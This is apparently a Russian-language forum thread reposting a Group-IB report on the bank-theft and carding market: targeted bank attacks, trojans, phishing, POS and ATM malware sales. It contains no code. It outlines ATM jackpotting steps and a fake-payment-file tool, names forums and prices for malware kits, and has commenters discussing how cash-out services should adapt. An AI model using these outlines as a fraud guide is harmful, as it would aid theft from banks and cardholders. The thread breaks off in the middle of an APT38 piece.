Объявление

Свернуть
Пока нет объявлений.

[Обзор] рынка высокотехнологичных хищений

Свернуть
X
 
  • Фильтр
  • Время
  • Показать
Очистить всё
новые сообщения

  • [Обзор] рынка высокотехнологичных хищений

    ОЦЕНКА РЫНКА ВЫСОКОТЕХНОЛОГИЧНЫХ ХИЩЕНИЙ В РОССИИ
    Финансовая оценка активности киберпреступников является ярким индикатором смены приоритетов хакеров. Большая часть атакующих следуют за деньгами и, если они находят новые более эффективные способы заработка, они инвестируют время и средства именно туда, создавая новые инструменты, услуги, схемы проведения атак. За прошедший период полностью ушли со сцены трояны для ПК, а хищения с помощью Android-троянов после нескольких лет взрывного роста резко сократились благодаря обновлениями операционной сети от Google, понижению лимитов на переводы по SMS, и с внедрением банками систем раннего обнаружения фрода с функционалом детектирования активности вредоносных программ на устройстве клиента.
    На подъеме фишинг – относительно простая тактика атак привлекает на рынок все больше злоумышленников. Основной угрозой для российских банков остаются хорошо подготовленные группы с практикой успешных целевых атак. В среднем в России каждый месяц они грабили 1-2 банка. Впрочем, в 2018 году было 4 месяца, когда мы не зафиксировали ни одного ограбления (январь, февраль, май и июнь).

    Далее мы подробно остановимся на группах, стоящих за этими атаками.


    Целевые атаки на банки
    На графике ниже показаны группы, которые проводят целенаправленные атаки на банки с целью хищений. На текущий момент существует всего четыре группы, которые способны
    взломать банк, добраться до изолированных финансовых систем и вывести деньги.

    Каждая из этих групп имеет более глубокую историю, на графе отмечены моменты начала и завершения попыток ограбить именно банки. Группы, которые занимаются саботажем и шпионаже, на иллюстрации не представлены.

    Cobalt, MoneyTaker, Silence состоят из русскоговорящих финансово-мотивированных хакеров, Lazarus принято считать спонсируемой Северной Кореей. Именно эти группы являются центром инноваций и формируют тренды в сложных атаках на банки.
    По каждой из этих киберпреступных групп Group-IB первой выпускала отчеты.



    SWIFT и локальные межбанковские системы

    Количество целенаправленных атак на банки с целью хищения через SWIFT увеличилось в три раза. Если за прошлый период было всего три атаки (Гонконг, Украина, Турция), то в этом году прошло успешных атак было уже девять: в Непале, Тайване, России, Мексике, Индии, Болгарии и Чили. По этим инцидентам можно сделать вывод, что для межбанковской системы SWIFT представляют угрозу только две преступные группы: Cobalt и Lazarus.

    Первая известная успешная атака Lazarus на SWIFT была проведена в феврале 2016 года в центральном банке Бангладеш. Буквально через два месяца группа Cobalt совершила сразу две успешных атаки на SWIFT в банках Гонконга и Украины.

    В некоторые месяцы и Cobalt, и Lazarus совершают хищения сразу в двух банках. Возможно, это связано с общей подготовкой схем обнала. Однако в случае со SWIFT большую часть похищенных средств удается остановить и вернуть пострадавшим банкам.

    Посмотрев на атакованные банки и связанные с ними группы, можно заметить, что Lazarus сосредоточила усилия на Азиатско-Тихоокеанском регионе, а Cobalt — на странах Восточной Европы. Атаки на SWIFT в России и Болгарии проводились без специальных инструментов, использовался только стандартный набор Cobalt. Получив в доступ в сеть банка и логины легитимных пользователей, они просто сделали несколько транзакций, большая часть из которых была успешно заблокирована.

    Несмотря на то, что Lazarus в этом году достаточно активно пытался похищать деньги через SWIFT, гораздо больших успехов в экономическом смысле они добились, атакуя криптовалютные биржи, о чем мы пишем в соответствующем разделе отчета. Фактов, подтверждающих что эта группа интересуется локальными системами межбанковских переводов не обнаружено.

    В одном из инцидентов было установлено, что Cobalt интересуется не только SWIFT, но и локальными системами межбанковских переводов в разных странах. Так, попав в сеть одного из банков, они попробовали вывести деньги и через локальный межбанкинг более 20 миллионов евро, но попытка была неуспешной.


    Атаки на AРМ КБР
    В 2016 году основную угрозу для банков в России представляли атаки на АРМ КБР (Aвтоматизированное рабочее место клиента Банка России). Однако в 2017 и 2018 году хакеры из групп Cobalt и Silence игнорируют данные системы даже в том случае, когда
    успешно получают к ним доступ. Сейчас их внимание привлекают более надежные схемы хищений через банкоматы и карточный процессинг. И только группа MoneyTaker сделала одно успешное хищений в ноябре 2017 года через АРМ КБР. Тогда сумма ущерба составила всего 7 миллионов рублей, а в 2018 они успешно вывели из другого банка уже 58 милли
    онов рублей. В начале июля 2018 пользователь под псевдонимом Bobby.Axelrod опубликовал на андеграундных форумах фреймворк Pegasus для автоматизации атак на АРМ КБР путем автоматической подмены платежных реквизитов. В архив также входили инструкции и исходные коды. Этот фреймворк использовался группой Buhtrap в 2016 году и все данные
    из архива относятся к тому периоду. Ранее часть исходных кодов, используемых Buhtrap, уже утекали в сеть. Стоит отметить, что реализованная в данном фреймворке автозамена платежных реквизитов уже не актуальна для последних версий АРМ КБР, однако
    архив представляет большую ценность для автоматизации других шагов по компрометации банковских сетей.

    КАРТОЧНЫЙ ПРОЦЕССИНГ
    Атаки на карточный процессинг по-прежнему являются одним из основных способов хищений и проводятся группами Cobalt, MoneyTaker, Silence. Этот метод х обеспечивает самый безопасный способ обналичивания и максимальную финансовую выгоду.
    Рекордсменом в этой области стала группа Cobalt: в 2017 году в европейском банке они попытались похитить 25 миллионов евро. В других регионах суммы ущерба как правило значительно ниже. Эта схема хищений начала набирать популярность в 2016 году. В сентябре 2016 года группа Cobalt получила доступ в один из банков Казахстана и начала подготовку к новому для них типу хищений — через карточный процессинг. Процесс изучения занял 2
    месяца, и в ноябре они успешно похитили около $600 тыс. С тех пор Cobalt — лидер по количеству успешных атак этого типа.
    Параллельно вместе с ними схему атак на карточный процессинг начала прорабатывать и группа MoneyTaker. Самая первая атака, с которой мы связываем эту группу, была проведена весной 2016 года, когда в результате получения доступа к системе карточного процессинга STAR компании FirstData был ограблен National Bank of Blacksburg (США). В январе 2017 этот банк подвергся еще одной успешной атаке, о чем стало известно только спустя 7 месяцев после публичного релиза нашего отчета об атаках этой группы. В течение 2017 MoneyTaker взломала еще 9 банков в США.

    Группа Silence провела свою первую атаку на карточный процессинг только в марте 2018 года
    и сразу успешно похитила 35 млн рублей в одном из банков в России. Для успешного хищения через карточный процессинг атакующим не нужен специализированный софт, как например для атак на банкоматы или для автоподмены платежей в системах межбанковских переводов. Поэтому этот метод доступен всем преступным группам, у которых есть опыт проникновения в банковские сети.

    ПЛАТЕЖНЫЕ ШЛЮЗЫ
    В этом периоде атаки на платежные шлюзы проводила только группа Cobalt. При этом во второй половине 2017 они похитили деньги у двух компаний, а в 2018 не сделали ни одной попытки. В результате реагирования на второй инцидент в 2018 году мы установили, что помощь в проведении этой атаки им оказывали участники из группы Anunak, которая не проводила подобных атак с 2014 года. Логика работы шлюза подразумевает обработку двух каталогов In и Out, куда помещаются файлы, которые содержат данные в формате, соответствующем транзакциям, полученным от платежных терминалов. Файлы платежей в каталоге In принимаются к исполнению и денежные средства переводятся согласно данным, указанным в файле.

    Чтобы изучить формат данных, атакующие воспользовались программой FileLogger.exe, позволяющей отслеживать изменения заданного каталога (создание новых файлов) и запись содержимого новых файлов в заданный текстовых файл. Каталог и файл задаются при запуске программы в качестве входных аргументов.

    Через такие шлюзы осуществляются переводы небольших сумм, поэтому для крупного хищения необходимо создать множество мелких транзакций. Чтобы автоматизировать работу, атакующие создали уникальную программу ugw.exe.

    При запуске программа запрашивает файл с именем «terminals.txt», в котором указываются идентификаторы терминалов, от имени которых якобы должны приходить запросы на перевод. Далее в программе указываются счета получателей в виде номеров телефонов и карт, а также суммы переводов. В результате происходит генерация поддельных файлов-платежей, которые сразу помещаются в каталог In платежного шлюза. Таким образом,
    атакующим удалось перевести более $2 миллионов.

    БАНКОМАТЫ
    Атаки на банки с целью заражения их банкоматной сети проводят Cobalt, Silence, а также MoneyTaker. Последняя группа начала тестировать новый уникальный троян в мае 2018 года.

    (c) Group-IB
    Последний раз редактировалось Тренер; 26-11-2018, 11:40.
    Телега - @trener_dm
    Ссылка https://t.me/trener_dm

  • #2
    АТАКИ НА КЛИЕНТОВ БАНКОВ

    АТАКИ НА КЛИЕНТОВ БАНКОВ

    АТАКИ С ПОМОЩЬЮ ТРОЯНОВ ДЛЯ ПК


    В России
    Тренд на снижение угроз со стороны банковских троянов для ПК в России продолжается с 2012 года. За прошедший период ущерб сократился еще на 12% и составил 547 800 000 руб. Как и за предыдущий год, не появилось ни одного нового банковского трояна для ПК для хищений в России. Более того, не осталось ни одной группы, которая бы занималась хищениями средств у физических лиц в России с использованием таких программ.
    Активность проявляют только группы, которые используют банковские трояны для хищений у компаний. Таких команд осталось всего три: Buhtrap2, RTM, Toplel. При этом ни одна из них не использует атаку «человек-в-браузере» (Man-in-the-browser).

    Buhtrap2
    В 2016 года бот-сеть Buhtrap была продана и теперь используется другими злоумышленниками. Основным методом распространения в первой половине 2017 года был метод Drive-by: преступники взламывали легитимные сайты финансовой тематики (например, www.glavbukh.ru), при посещении которых загружался JavaScript, после чего происходила эксплуатация уязвимости браузера. В результате запускался PowerShell-скрипт, загружающий и приводящий в действие загрузчик Buhtrap. Во второй половине 2017 года тактика атакующих изменилась: вектором распространения троянов стала не традиционная вредоносная рассылка и не взломанные популярные сайты, а создание новых тематических ресурсов, на которых злоумышленники размещали код, предназначенный для загрузки троянов.
    Владельцы этой бот-сети активно использовали автоматические переводы через системы бухгалтерского учета 1С. После того, как разработчики 1C реализовали защиту от атак этого типа, включив проверку замены реквизитов, хакеры изменили свой код. Новый Buhtrap способен обходить защиту «1С:Предприятие» «Контроль безопасности обмена с банком»
    путем сокрытия отображаемого предупреждения.


    RTM В мире
    Банковский троян RTM начал свою активность в 2016 году и остается востребован преступниками. В конце 2016 года мы видели, что при распространении трояна RTM использовался загрузчик из утекших исходных кодов Buhtrap. Такая связь нередко сбивает специалистов по информационной безопасности при атрибуции.

    Как и в случае Buhtrap2, основными способами совершения хищения являются удаленное управление или автоматические переводы через системы бухгалтерского учета 1С. Однако мы не видели атак, которые бы обходили реализованную «1С:Предприятие» защиту от автоподмены реквизитов, как это сделано в Buhtrap.

    Toplel
    Преступная группа Toplel была обнаружена специалистами Group-IB в феврале 2015 года. В результате исследования было установлено, что она действует минимум с августа 2014 года и использует доменные имена, регистрируемые в зоне .SU. На тот момент для совершения хищений злоумышленники задействовали программу, известную как RDPdoor (xTerm).
    Она предоставляет злоумышленнику удаленный доступ к компьютеру, что позволяет совершать транзакции с рабочего места пользователя в тот момент, когда подключен токен с электронной цифровой подписью, необходимой для подтверждения переводов. Программа распространялась преимущественно через письма с вредоносным вложением. Основной целью злоумышленников были клиенты банков России и Украины. Модули трояна RDPdoor определяли следующие системы интернет-банкинга Ibank, bifit, Промсвязь, Альфабанк, Diasoft, Сбербанк, Комита, Tiny, Fobos, ClntW32, cbsmain, BCClient, Tival, cbs, Севергазбанк, Ibc, Interbank, RS.
    Кроме трояна RDPdoor, преступники работают с модифицированной версией вредоносной программы Pony, которая может быть использована для сбора логинов и паролей на системах, не имеющих отношение к интернет-банкингу.

    В мире
    Глобальный ландшафт угроз со стороны банковских троянов изменился значительно сильнее. Появилось шесть новых целевых троянов для ПК: IcedID, BackSwap, DanaBot, MnuBot, Osiris и Xbot. Такое же количество троянов появилось и в прошлом году. Однако использование новых банковских троянов носит преимущественно локальный характер. Трояны Osiris и Xbot изначально предлагались на русскоговорящих хакерских форумах и пока не получили широкого распространения.

    При этом со сцены ушли Shifu, Qadars, Sphinx, Tinba и Emotet. Последний по-прежнему используется, но только в качестве загрузчика, а не как полноценный банковский троян. Такое развитие событий может быть связано с работой правоохранительных органов, которые нанесли по рынку ощутимый удар арестами авторов банковских троянов Neverquest,
    GozNym, а также одного из самых популярных загрузчиков — Andromeda.
    В 2017 году были опубликованы исходные коды банковских троянов TinyNuke и AlphaLeon ( akaThantaos, Mercury Bot), однако их дальнейшего использования не последовало. Мы все еще видим использование банковских троянов, основанных на Zeus (ZeusVM, Atmos, Panda),
    но значительно реже и без какого-либо значимого развития. Можно сказать, что они доживают последние дни. Наиболее значимыми банковскими угрозами по-прежнему остаются группы, использующие трояны Dridex, Trickbot, Gozi.

    АТАКИ С ПОМОЩЬЮ ANDROID-ТРОЯНОВ


    После нескольких лет роста рынок Android-троянов в России вышел на плато, однако продолжает активно развиваться на мировой арене. Пять наиболее распространенных схем хищений, описанных нами в отчете за 2016 год, остались прежними:
    • • Хищение через SMS-банкинг
    • • Переводы с карты на карту
    • • Переводы через онлайн-банкинг
    • • Перехват доступ к мобильному банкингу
    • • Поддельный мобильный банкинг


    В России
    Активность владельцев Android-троянов резко снизилась благодаря задержаниям в 2017 году владельцев крупнейших в России Android бот-сетей: Cron и Tiny.z. Кроме того, владелец другой крупной бот-сети Honli просто прекратил использование этого трояна. Как следствие, количество проводимых ежедневных хищений снизилось почти в три раза. Также стоит отметить и снижение среднего размера хищений с использованием Android-троянов. Если в прошлом году он составлял 11 тысяч рублей, то в этом году он опустился до 7 тысяч.
    Самой активной в прошедшем году была бот-сеть Asacub на базе одноименного приватного трояна.
    В августе 2017 появилось предложение о продаже форка этой вредоносной программы, но уже в сентябре тема была закрыта. Вторая по активности бот-сеть Agent.BID долгое время совсем не использовалась, и лишь с начала 2018 года ее владельцы вернулись к активной работе.

    В мире
    Новые Android-трояны, предлагаемые на хакерских форумах, ориентированы прежде всего на использование за пределами России: Easy, Exobot 2.0, Asacub, CryEye, Cannabis, fmif, AndyBot, Loki v2, Nero banker, Sagawa. Исключением из этого списка является только Asacub.
    После публикации исходных кодов трояна Maza-in появилось множество его клонов, которые используются до сих пор. В июле 2017 года другой автор банковского трояна под Android Loki Bot также выложил исходные коды в открытый доступ.
    Троян Agent.cj носит чисто локальный характер и атакует пользователей турецких банков. Обычно банковские трояны под Android распространяются через SMS/MMS рассылки. Однако троян Exobot 2.0 в начале 2018 года распространялся через приложения, которые ранее были загружены из официального Google Play. В мае 2018, после того как автор полностью продал свой проект, исходные коды Exobot 2.0 были опубликованы в открытом доступе.
    Очень активным русскоговорящим разработчиком банковских Android-троянов является хакер под псевдонимом GanjaMan, который разработал всем известные Gmbot (aka Mazar), Skunk, VBV Grabber. Его старые разработки более не используются, а сам автор этих вредоносных программ заблокирован на хакерских форумах. Однако до блокировки он
    успел продать исходные коды своего нового трояна Cannabis.
    Трояны, которые были активны в прошлом периоде перестали использоваться, вероятно, из-за плохой поддержки их авторами. К таким троянам относятся Xbot, Abrvall, Vasya, UfoBot, Reich.

    Атаки с помощью веб-фишинга

    В мире
    За прошедший период GIB Threat Intelligence обнаружила и проанализировала 2,6 миллиона уникальных фишинговых ссылок на 727 тысячах доменах — на 9% больше, чем в прошлом году. Подавляющее большинство сайтов для хостинга фишинга (46%) использовали зону .com. на зоны .org, .mx, .net приходится по три процента. Как всегда основная масса фишинговых страниц хостилась в США — 63%. При этом большая часть фишинга хостится на легальных, но взломанных веб-сайтах. В отличии от прошлого периода, первую позицию заняли фишеры, нацеленные на облачные хранилища, а не на финансовый сектор. Неожиданно, самым популярным среди фишеров стал Dropbox, хотя ранее мы видели, что атакующих больше интересуют сервисы Google. 73% всех фишинговых ресурсов попадают в следующие три категории: облачные хранилища (28%), финансы (26%), и онлайн-сервисы (19%).


    Как и ожидалось, больше всего финансового фишинга относится к компаниям США. На их долю пришлось 80% всех атак в категории. Второе место занимает Франция, потом Германия. На различные проекты, связанные с криптовалютами, пришлось по 1%.

    Фишеры, занимающиеся массовыми атаками, используют специальные фишинг-наборы (phishing kits). За прошедший период система GIB Threat Intelligence собрала более 18 000 уникальных таких наборов и проанализировала их конфигурационные файлы. В подавляющем большинстве случаев скомпрометированные данные отправлялись на адрес элек- тронной почты. В 84% случаев фишеры регистрировали почту для сбора скомпрометированных данных на Gmail, на российские Yandex и Mail.ru приходится лишь 4%.

    В России

    Веб-фишинг — единственный метод хищений, который показал рост в России в этом году. Количество групп, которые создают фишинговые сайты под российские бренды, выросло с 15 до 26. В России фишинг под банки и платежные системы автоматизирован и проходит в реальном времени, что позволяет обходить SMS подтверждения списания денег. Простота
    схем и широкий спектр инструментов для хищений привлекает на фишинговый рынок новых игроков.
    В этом году с помощью веб-фишинга удалось похитить 251 миллион рублей, что на 6% больше, чем в прошлом году. Средняя сумма одного хищения не изменилась и составляет 1 000 рублей. Общее количество ежедневных успешных атак также выросло, но незначительно — до 1 274. Среднее количество жертв одной группы даже сократилось с 63 до 42. Основным фактором, сдерживающим рост количества атак, является активное выявление фишинговых сайтов и их оперативное закрытие, в том числе благодаря оперативному обмену данными между банками и ФинЦертом (FinCERT) Банка России.
    Основными способами привлечения пользователей на фишинговые страницы являются перенаправление посетителей со взломанных сайтов, а также в результате попадания в поисковую выдачу. В России, в отличие от многих других стран, под большую часть фишинговых сайтов регистрируется отдельное доменное имя.
    Большую популярность получил фишинг связанный с переводов с карты на карту. В некоторых случаях атакующие брендируют такие фишинговые страницы под конкретный банк, но есть и «небрендированный» фишинг.
    Телега - @trener_dm
    Ссылка https://t.me/trener_dm

    Комментарий


    • #3
      Отсюда и ответы для обнал сервисов, почему работы стало у них меньше.

      Комментарий


      • #4
        В 2016 году основную угрозу для банков в России представляли атаки на АРМ КБР (Aвтоматизированное рабочее место клиента Банка России). Однако в 2017 и 2018 году хакеры из групп Cobalt и Silence игнорируют данные системы даже в том случае, когда успешно получают к ним доступ.
        Прикольно) - Бери, - Не не хочу.
        В целом интересная информация.

        Комментарий


        • #5
          Сообщение от Свой из Маями Посмотреть сообщение
          Отсюда и ответы для обнал сервисов, почему работы стало у них меньше.
          ++
          Есть над чем подумать и немного перестроиться
          Телега - @trener_dm
          Ссылка https://t.me/trener_dm

          Комментарий


          • #6
            Сообщение от FillMorr Посмотреть сообщение
            ++
            Есть над чем подумать и немного перестроиться
            99,9% обнал сервисов не способно перестроиться и адаптироваться к данным условиям. На всех не хватит скама и подмены, это очевидно.

            Комментарий


            • #7
              Кардинг
              Рынок кардеров можно поделить на два основных сегмента: продажа текстовых данных о картах (номер, дата истечения, имя держателя, адрес, CVV) и «дампов» (содержимое магнитных полос карт). Текстовые данные собираются с помощью фишинговых сайтов, банковских троянов для ПК, Android, банкоматов, а также в результате взломов e-commerce сайтов. Дампы получают с помощью скимминговых устройств, а также с помощью троянов для компьютеров с подключенными POS-терминалами.
              Большая часть скомпрометированных карт продается на специализи рованных кард-шопах. Системы GIB Threat Intelligence постоянно фиксируют и анализирует загружаемые на кард-шопы данные. В среднем каждый месяц на них загружается 686 тысяч текстовых данных карт и 1.1 миллионов дампов. По нашим данным, 62% продаваемых данных карт относятся к дампам. Это означает, что POS-угрозы являются основным методом компрометации банковских карт.
              Кроме количественных показателей, мы фиксируем и стоимость каждого дампа, что позволяет измерять рынок кардинга. Текстовая информация о банковских картах стоит на кардшопах значительно дешевле: суммарно текстовые данные продавали всего за $95.6 миллионов, что составляет всего лишь 17% от общего рынка. Например, 19.9 миллионов дампов стоили уже $567.8 миллионов.


              POS-угрозы
              Основным методом получения дампов банковских карт является использование POS-троянов, которыми заражают компьютеры с подключенными POS-терминалами. Принцип работы всех POS-троянов остался неизменным: они собирают данные карт из оперативной памяти в тот момент, когда карты считывают через POS-терминал.
              Атакующие по-прежнему делятся на две категории:
              • • массово и случайно атакующие всех подряд в поисках возможности установить POS-троян;
              • • целенаправленно атакующие вендоров POS-терминалов или крупные сетевые организации, доступ в сети которых открывает возможность заражения сразу множества устройств.
              Самый серьезный удар по индустрии кардинга был нанесен в начале 2018 года, когда Министерство юстиции США сообщило об аресте и предъявлении обвинений трем гражданам Украины, которые входили в состав группы FIN7 (aka Navigator). Согласно данным из обвинительных заключений Дмитрий Федоров (Hotdima), Федор Гладырь (Das или AronaXus) и Андрей Копаков (Santisimo) были задержаны в январе и марте 2018. Официальное заявление Министерства юстиции гласит, что с 2015 года группа FIN7 атаковала более 100 компаний и организаций на территории США, взломав тысячи различных систем. Сообщается, что только в США хакеры похитили свыше 15 миллионов платежных карт, скомпрометировав более 6 500 PОS-терминалов. Рынок POS-угроз достаточно динамичный. Отслеживая андеграундные форумы и участвуя в реагировании на инциденты, специалисты Group-IB регулярно наблюдают появление новых троянов, а также
              продажу и публикацию в открытом доступе исходных кодов уже зарекомендовавших в реальных атаках инструментов.

              Продажа и публикация исходных кодов POS-троянов

              05 октября 2017 На андеграундном форуме было опубликовано объявление о продаже исходного кода банковского бота Dented. Данный троян обладает функциями по сбору TRACK1 и TRACK2 банковской карты. Продажа осуществляется трем клиентам по цене $3000 с оплатой в Bitcoin.
              8 февраля 2018 Пользователь ftp_admin выставил на продажу исходные коды своего трояна POS Sniffer за $5000. Троян, продававшийся с марта 2016 года, реализован в виде драйверов к системе и работает под Windows x32.
              08 июня 2018 Поль зователь cocofresh опубликовал тему с продажей исходных кодов POS-трояна MagicPos с административной панелью за $350.
              08 мая 2018 Пользователь Unsigned char опубликовал ссылку на скачивание исходных кодов POS-трояна для сбора Track1 и Track2.
              06 апреля 2018 Пользователем crossair опубликовал на андеграундном форуме архив, содержащий исходные коды POS-трояна Treasure Hunter. Впервые информация об этом трояне появилась еще в 2014 году. Архив trhutt34C.rar содержит внутри себя два файла: adminPanel.rar и cSources.rar — исходные коды административной панели и самой вредоносной программы.



              Новые трояны
              Июнь 2017 Зафиксирована серия атак на бразильские компании с новым POS трояном LockPos, который связывают с группой, ранее использовавшей FlokiBot.
              Сентябрь 2017 Пользователь Refreshers опублико вал тему по продаже нового трояна для POS-систем SisyphusPOS.
              Октябрь 2017 Специалисты из Proofpoint обнаружили, что группа Lazarus использует новый POS-троян RatankbaPOS для атак на компании в Южной Корее.
              Ноябрь 2017 Специалистами RSA был выявлен новый POS-троян GratefulPOS, код которого состоит из фрагментов кодов вредоносных семейств FrameworkPOS, TRINITY, BlackPOS и BrickPOS. По аналогии с FrameworkPOS, вредонос извлекает данные платежных карт из оперативной памяти терминала и отправляет их на управляющий сервер в виде зашифрованных DNS-запросов.
              Декабрь 2017 Исследователи из компании Kroll Cyber Security идентифицировали еще один POS-троян PinkKite. PinkKite весит всего 6 КБ и содержит модули считывания памяти и проверки данных. Особенностью этой кампании является ручная пересылка данных карт через отдельный сеанс RDP на один из трех центров обмена информацией PinkKite.
              Февраль 2018 Исследователи из компании Forcepoint обнаружили троян с именем UDPoS, маскирующийся под легитимное средство удаленного управления LogMeIn и передающий данные кредитных карт с помощью DNS-запросов.

              ATM-угрозы

              Некоторые группы не способны взломать сеть банка и заразить банкоматную сеть, но могут заразить отдельные банкоматы при наличии физического доступа. В прошедшем периоде для банковского сектора активными были две угрозы: Cutlet и Ploutus-D.
              Общая схема атаки «Jackpotting» включает 3 уровня злоумышленников:
              • • организатор / заказчик;
              • • разработчик ПО;
              • • дропы.
              Главным в атаке является организатор, чаще всего он и заказывает разработку вредоносной программы. Основной целью организатора является получение денег с минимальными рисками. Для начала работы ему нужен полный набор инструментов. Есть два пути для их получения: заказать у разработчиков или перекупить у других злоумышленников. Далее организатор находит команду дропов (не менее 2-х человек) — людей, которым необходимо получить физический доступ к внутренней системе банкомата.
              Чтобы дропы не обманули организатора и не начали самостоятельную работу, в наборе вредоносных программ имеется специальный генератор ключей. Когда вредоносное ПО загружается в банкомат, оно требует ключ активации для дальнейшей работы. Такой ключ можно получить только из генератора ключей, который находится у организатора.

              Для вскрытия банкомата злоумышленники высверливают, прорезают или прожигают отверстия на лицевой панели клавиатуры банкомата. Средний размер отверстия составляет 5 сантиметров. После этого они получают прямой доступ к шлейфу проводов. Злоумышленники отсоединяют диспенсер от USB-хаба или COM-порта (в зависимости от банкомата) и устанавливают на его место специальную заглушку, которая имитирует работу диспенсера. Затем они подключают к USB/COM порту диспенсера микрокомпьютер с низким энергопотреблением. В этот момент дропы используют телефоны для взаимодействия с организатором и получения ключа активации. Средняя продолжительность действий злоумышленников, требуемых для хищения денежных средств, составляет около 8 минут. После получения наличности преступники заклеивали отверстие в банкомате с помощью наклейки.

              Cutlet
              В середине 2017 года появился новый комплект для атак на банкоматы, в том числе с новой вредоносной программой, которую назвали cutlet. Теперь вместе с набором инструментов шла максимально подробная инструкция по использованию с советами, как избежать проблем при работе. Впоследствии cutlet получила собственное приложение под Android, что позволяло злоумышленнику не использовать ноутбук, а обходится смартфоном.


              Набор «Cutlet» до сих пор остаётся актуальным. Мы наблюдаем большое количество активных тем о продаже на хакерских форумах.
              06 декабря 2017 Пользователь под ником cutlet master опубликовал предложение о продаже полного набора софта Cutlet Maker на форуме crdclub.ws. Стоимость полного набора составила 1 000$. в набор входят 3 программы:
              • • Stimulator22 — предназначена для проверки баланса в кассетах банкомата;
              • • c0decalc — предназначена для генерации кода активации программы Cutlet Maker;
              • • Cutlet Maker 1.0 F — предназначена для вывода денег из банкомата.
              15 декабря 2017 Пользователь под ником md5 опубликовал предложение о продаже полного набора софта Cutlet Maker на форуме ifud.ws. Стоимость полного набора составила уже $800, однако через неделю цена была снижена до $500. Отметим, что самый первый комплект «cutlet» продавался за $5 000.
              17 января 2018 Пользователь под ником «she0» опубликовал предложение о продаже полного набора софта «Cutlet Maker» на форуме moneymaker.hk. Стоимость полного набора составила 50 000 рублей.
              20 декабря 2017 На самом популярном русскоязычном андеграундном форуме exploit.in была устроена бесплатная раздача полного набора ПО. Пользователь под ником Onions пообещал раздать софт первым 3 отписавшимся старожилам форума.
              20 декабря 2017 На форуме migalki.pw пользователь под ником vulns опубликовал ссылку для скачивания cutlet. Архив содержал два файла: cm17F (Cutlet Maker 1.7 F), Stimulator22.
              28 мая 2018 Пользователь с псевдонимом sl111 опубликовал объявление о продаже нового ATM трояна Котлета v2. Объявление было размещено на форуме exploit.in.
              Котлета v2 представляет собой вредоносную программу для банкоматов Wincor. Исходя из текста объявления, Котлета v2 обладает практически теми же функциональными возможностями, что и Cutlet Maker. Отличием трояна от своего предшественника является отсутствие необходимости в генерации паролей активации (генерация происходила с помощью утилиты c0decalc.exe). Автор объявления, судя по сообщению являющийся разработчиком этого вредоносного ПО,предложил троян вместе с исходными кодами. Троян написан на C/C++. Цена Котлеты v2 составляет $5 000. В комплекте с трояном идут исходные коды, документация и инструкция по его применению.

              Ploutus-D
              25 января 2018 компания Diebold Nixdorf опубликовала отчёт «Potential Jackpotting US». В нём сообщается, что власти США предупреждают компанию о том, что на территории США впервые зафиксирована атака типа «Jackpotting» на банкоматы, произведенные их компанией. Ранее, в октябре 2017 года подобная атака была зафиксирована на территории Мексики. Также в СМИ появилась информация, что атаке могли подвернуться банкоматы компании NCR Corp. Предположительно, злоумышленники для атаки использовали вредоносное ПО Ploutus-D.
              Ploutus-D – новая модификация более старой версии Ploutus. Эта программа впервые была замечена в Мексике в 2013 году. Тогда она распространялась при помощи CD-ROM. Первые упоминания Ploutus-D на андеграундных форумах датируются началом 2017 года. Однако ни одного положительного отзыва о работе или хотя бы проверке данного ПО нет, а все вендоры, которые создавали топики о его продаже, имеют пло*** репутацию. Активных продаж программы на андеграундных форумах не замечено.
              Ploutus не уникальная разработка, в мире существует несколько различных реализаций примерно одной и той же схемы атаки. Различия между ними минимальны и сводятся к специализации на определённом виде банкоматов, наиболее распространённых в регионе использования программы.

              (c)Group-IB
              Телега - @trener_dm
              Ссылка https://t.me/trener_dm

              Комментарий


              • #8
                Сообщение от FillMorr Посмотреть сообщение
                Cutlet
                В середине 2017 года появился новый комплект для атак на банкоматы, в том числе с новой вредоносной программой, которую назвали cutlet. Теперь вместе с набором инструментов шла максимально подробная инструкция по использованию с советами, как избежать проблем при работе. Впоследствии cutlet получила собственное приложение под Android, что позволяло злоумышленнику не использовать ноутбук, а обходится смартфоном.


                Набор «Cutlet» до сих пор остаётся актуальным. Мы наблюдаем большое количество активных тем о продаже на хакерских форумах.
                6 ноября 2018г. задержаны двое молодых людей, подозреваемых в хищении денежных средств из терминалов.
                Установлено, что злоумышленники на территории г. Москвы и других регионов России с 2017 года похищали денежные средства из банкоматов различных кредитно-финансовых учреждений России. Подозреваемые использовали носитель информации, на котором находилось программное обеспечение удаленного доступа к операционной системе платежных устройств, который после подключения позволяло совершать манипуляции необходимые для выгрузки денежных средств.
                В результате оперативно-розыскных мероприятий в Луховицком районе Московской области сотрудниками полиции была остановлена автомашина, в которой находились двое мужчин в возрасте 29 и 32 лет. При осмотре автомобиля изъяты денежные средства на общую сумму более 6,5 миллиона рублей. Обнаружены мобильные телефоны, сим-карты и ноутбуки, которые использовались для совершения противоправных деяний.
                возбуждено уголовное дело по признакам преступления, предусмотренного частью 2 статьи 159.6 УК РФ. В отношении фигурантов судом избрана мера пресечения в виде заключения под стражу.
                Установлены обстоятельства 12 аналогичных преступлений, совершенных на территории Российской Федерации. По предварительным оценкам, сумма материального ущерба юридическим лицам превысила 20 миллионов рублей.
                В настоящее время сотрудники полиции проводят комплекс оперативно-розыскных мероприятий и следственных действий, направленных на выявление дополнительных эпизодов противоправной деятельности подозреваемых.

                https://www.youtube.com/watch?v=bkA-C2F9wLk
                Последний раз редактировалось Тренер; 07-11-2018, 17:07.
                Телега - @trener_dm
                Ссылка https://t.me/trener_dm

                Комментарий


                • #9
                  Взлом по-северокорейски. Как APT38 уводит из банков сотни миллионов долларов.

                  Взлом по-северокорейски. Как группировка APT38 уводит из банков сотни миллионов долларов.

                  Если ты воображаешь, что в Северной Корее примерно три компьютера, на одном из которых Ким Чен Ын играет в League of Legends, а на другой кладет ноги, то ты ошибаешься. Северокорейские хакеры теперь фигурируют в новостях о крупных взломах наравне с русскими и китайскими, и их успехи впечатляют. Группа APT38 за четыре года похитила для своей страны сотни миллионов долларов прямо из банков. Вот как это происходит.

                  Недавно на сайте компании FireEye был опубликован доклад Un-usual Suspects («Необычные подозреваемые»), для подготовки которого исследователи скрупулезно изучили всю доступную информацию о северокорейских хакерах, проанализировали их методы и инструменты, а главное, мотивы атак. Именно на основании мотивов им удалось более четко выделить отдельные группировки, которые раньше СМИ валили в одну кучу под общим названием Lazarus Group.

                  INFO
                  FireEye базируется в Кремниевой долине и занимается кибербезопасностью. Компания помогает бороться с угрозами многим гигантам из списка Fortune 500: среди ее клиентов Yahoo, Microsoft, Pfizer, eBay, Adobe и даже американская разведка.


                  Мотивы и инструменты
